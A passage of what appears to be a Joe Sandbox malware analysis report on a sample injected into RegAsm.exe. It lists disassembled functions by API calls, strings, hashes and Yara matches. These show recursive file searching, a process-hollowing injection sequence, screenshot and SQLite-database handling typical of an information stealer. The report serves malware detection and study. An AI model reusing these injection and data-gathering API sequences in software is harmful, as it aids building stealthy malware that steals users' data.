                                                    • Opcode ID: defa912096274b33364ccc9781972fdf005cb23e8a4ea8b6f4c2c678f65133d7
                                                    • Instruction ID: e682058c765c3eed9424c7c912d02b9114c1685d086e83408ab55d0a98466556
                                                    • Opcode Fuzzy Hash: defa912096274b33364ccc9781972fdf005cb23e8a4ea8b6f4c2c678f65133d7
                                                    • Instruction Fuzzy Hash: 1E71EC729101189ADF04FBA1DCA6DEE7379BF14305F50412EF616A21F1EE399A88CB94
                                                    Function 00412F92 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FolderPathlstrcpy
                                                    • String ID:
                                                    • API String ID: 1699248803-0
                                                    • Opcode ID: 47392e84d6d6294a81bee49d13ce944e3ea666f2a03f2c076f629e9461e68349
                                                    • Instruction ID: aa325d3f94b7a9653be548765aa3873853a6de89a1716966dfff1a03a5bef2b1
                                                    • Opcode Fuzzy Hash: 47392e84d6d6294a81bee49d13ce944e3ea666f2a03f2c076f629e9461e68349
                                                    • Instruction Fuzzy Hash: 7DE04F3094034DBBDB51EF50CC92FCD376C9B04B05F404191B60CAA0D0DA70EB858B54
                                                    Function 00412FD6 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocLocal
                                                    • String ID:
                                                    • API String ID: 3494564517-0
                                                    • Opcode ID: 23ddd831960a07a4baf59c42516714ef093421010defdf0cacab57d0b5a2c2c6
                                                    • Instruction ID: d6433807a1b8db94d6cb6db165d9c0c75de4d80c94e6a7adbc32009b6d90f099
                                                    • Opcode Fuzzy Hash: 23ddd831960a07a4baf59c42516714ef093421010defdf0cacab57d0b5a2c2c6
                                                    • Instruction Fuzzy Hash: 2F019274900208FFDB05CF98C585BED7FF4EB0931AF248089E505AB294C279AF84DB15
                                                    Function 00412B6B Relevance: 1.3, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc
                                                    • String ID:
                                                    • API String ID: 2803490479-0
                                                    • Opcode ID: e9ef69333db613a216edd2c8bf2b23955e04f01125ce089b17a326d4bede4d29
                                                    • Instruction ID: 52e30e3b9de2c83f9cf9caa13978d237713c2858ae44fde087075dd4632ce1ce
                                                    • Opcode Fuzzy Hash: e9ef69333db613a216edd2c8bf2b23955e04f01125ce089b17a326d4bede4d29
                                                    • Instruction Fuzzy Hash: ABC04C70A1411DBB8B04EB59E94284DBBE89A04298B504069F40896151D671AE419658

                                                    Non-executed Functions

                                                    Function 004164C7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 318fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$Filememset$CloseFirstNextwsprintf
                                                    • String ID: %s\%s$%s\%s\%s$%s\*.*$&lA
                                                    • API String ID: 1738266208-75341197
                                                    • Opcode ID: f7f780e0dd3665170da10018ac09bac4819302ea1bebc1e397a737024f7557df
                                                    • Instruction ID: 60e5edfdf85aad70732b1e4ef0ca2121454fa8e33e52d4ef02f059937bdc4f17
                                                    • Opcode Fuzzy Hash: f7f780e0dd3665170da10018ac09bac4819302ea1bebc1e397a737024f7557df
                                                    • Instruction Fuzzy Hash: 5DD14C71D00229ABDF21EB61DC46EED77BDAB14304F5040E6F609A61A1EB399BC4CF58
                                                    Function 004177D3 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 207fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • wsprintfA.USER32 ref: 004177EB
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00417802
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 00417830
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 00417846
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00417AE3
                                                    • FindClose.KERNEL32(000000FF), ref: 00417AF7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                    • String ID: %s\%s$%s\*
                                                    • API String ID: 180737720-2848263008
                                                    • Opcode ID: 657ecea2f7339c96ef864b768e83d4070e8e48e31d1e940a008eb1853424de94
                                                    • Instruction ID: dac6644e6c426f194ff9d57a8aa95e65468d73e99b130408ca5d31604c6df95e
                                                    • Opcode Fuzzy Hash: 657ecea2f7339c96ef864b768e83d4070e8e48e31d1e940a008eb1853424de94
                                                    • Instruction Fuzzy Hash: 72811C71900218ABDF10EBA0DC49EEA77BDBB05305F5441AAF519E20A1EF399BC4CF95
                                                    Function 00413160 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: image/jpeg
                                                    • API String ID: 2221118986-3785015651
                                                    • Opcode ID: cc8ab27e720a20a23eab8e41ad5ab027d939e4f2186a1a1e13e75b9e65c47b70
                                                    • Instruction ID: 8cb807e951e241fb08b0210496002e79f381f36e9f99992af28822dfc1dcb1ba
                                                    • Opcode Fuzzy Hash: cc8ab27e720a20a23eab8e41ad5ab027d939e4f2186a1a1e13e75b9e65c47b70
                                                    • Instruction Fuzzy Hash: A761F675910208EFDF01AFE0EC49BECBBBAFF05316F104025F915AA1A0DB359A95DB58
                                                    Function 0041738D Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 176stringmemoryfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041739D
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004173A4
                                                    • wsprintfA.USER32 ref: 004173BF
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004173D6
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 00417404
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 0041741A
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0041756F
                                                    • FindClose.KERNEL32(000000FF), ref: 00417583
                                                    • lstrcatA.KERNEL32(?,?,00000104), ref: 004175A7
                                                    • lstrcatA.KERNEL32(?), ref: 004175BA
                                                    • lstrlenA.KERNEL32(?), ref: 004175C6
                                                    • lstrlenA.KERNEL32(?), ref: 004175D6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                    • String ID: %s\%s$%s\*
                                                    • API String ID: 13328894-2848263008
                                                    • Opcode ID: 15216038eecd218f53dfb6339684c482d6ccd4587650b80a72e0b2fa1e1dfb87
                                                    • Instruction ID: fd5b16bab9cc8da3066a7ef37530c76d79a35a43c54b9e21b9ef39b57dedf1c2
                                                    • Opcode Fuzzy Hash: 15216038eecd218f53dfb6339684c482d6ccd4587650b80a72e0b2fa1e1dfb87
                                                    • Instruction Fuzzy Hash: 42614D71940218ABDF10EBA0DD9AEDD777DBB15304F4004AAF619E20A1EB399BC4CF58
                                                    Function 00410A14 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 157threadinjectionmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 00410A4F
                                                    • memset.MSVCRT ref: 00410A5F
                                                    • CreateProcessA.KERNEL32(?,00413EEF,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00410A81
                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00410AA7
                                                    • GetThreadContext.KERNEL32(?,00425200), ref: 00410ABF
                                                    • ReadProcessMemory.KERNEL32(?,63614D20,00000000,00000004,00000000), ref: 00410AE5
                                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00410B01
                                                    • ResumeThread.KERNEL32(?), ref: 00410B13
                                                    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00000000), ref: 00410B3B
                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00410B92
                                                    • WriteProcessMemory.KERNEL32(?,63614D20,?,00000004,00000000), ref: 00410BB5
                                                    • SetThreadContext.KERNEL32(?,00425200), ref: 00410BD3
                                                    • ResumeThread.KERNEL32(?), ref: 00410BDC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$MemoryThread$Write$AllocContextResumeVirtualmemset$CreateRead
                                                    • String ID: rBA
                                                    • API String ID: 619895632-1805662637
                                                    • Opcode ID: 8fae5ad8a6bd18f96976710600a56f6f1893c295b43ec00557706067b69940d9
                                                    • Instruction ID: 29a3e22a4fab1a202d948375e78a5d08e4a1dee15bb7358fe06653ab9b027ff8
                                                    • Opcode Fuzzy Hash: 8fae5ad8a6bd18f96976710600a56f6f1893c295b43ec00557706067b69940d9
                                                    • Instruction Fuzzy Hash: B561CD75A40208EFDB00DF98CC85FEDBBB5BF08315F108095F615AB2A1D3B5AA90DB24
                                                    Function 1FB4D9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-860711957
                                                    • Opcode ID: 650afc754bf6ffca4ca98e8ae9960d84098b1ab0906beb02fb231cec8e15f4c5
                                                    • Instruction ID: 4cc00a00ce1e0705423cfa8ac4bd8e2619391291ac288f7f79b1abec41bf1520
                                                    • Opcode Fuzzy Hash: 650afc754bf6ffca4ca98e8ae9960d84098b1ab0906beb02fb231cec8e15f4c5
                                                    • Instruction Fuzzy Hash: 3312F4B49047419BE7208F24EE54B9777E4FF49318F14062CE99B8B382E77AF4059B92
                                                    Function 00416D7D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 123fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • wsprintfA.USER32 ref: 00416D98
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00416DAF
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 00416DDD
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 00416DF3
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00416F36
                                                    • FindClose.KERNEL32(000000FF), ref: 00416F4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                    • String ID: %s\%s
                                                    • API String ID: 180737720-4073750446
                                                    • Opcode ID: e2b85eadb093ec973f3d2cf701caf6266cf0745fef5b918c247462645373d3d4
